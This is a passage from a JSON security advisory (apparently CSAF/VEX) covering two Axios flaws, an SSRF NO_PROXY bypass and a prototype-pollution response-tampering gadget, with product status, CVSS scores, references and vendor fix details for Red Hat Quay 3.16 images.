            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling"
    },
    {
      "cve": "CVE-2026-42043",
      "cwe": {
        "id": "CWE-918",
        "name": "Server-Side Request Forgery (SSRF)"
      },
      "discovery_date": "2026-04-24T19:01:22.552379+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461626"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. An attacker who can control the destination address of an Axios request can exploit this vulnerability. By using specific internal network addresses (within the 127.0.0.0/8 range, excluding 127.0.0.1), the attacker can completely bypass the NO_PROXY protection, potentially leading to unauthorized access or information disclosure within the network. This issue is an incomplete fix for a previous vulnerability.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: NO_PROXY bypass via crafted URL",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461626",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461626"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42043",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7"
        }
      ],
      "release_date": "2026-04-24T17:54:42.668000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: NO_PROXY bypass via crafted URL"
    },
    {
      "cve": "CVE-2026-42044",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T19:01:13.418725+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461624"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a widely used HTTP client. This vulnerability, known as a Prototype Pollution \"Gadget\" attack, allows a remote attacker to subtly alter JSON API responses. By manipulating a specific function, an attacker can selectively modify data within these responses. This could lead to significant security breaches, including unauthorized privilege escalation, fraudulent balance manipulation, or bypassing critical authorization checks.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461624",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461624"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42044",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23"
        }
      ],
      "release_date": "2026-04-24T17:49:49.517000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
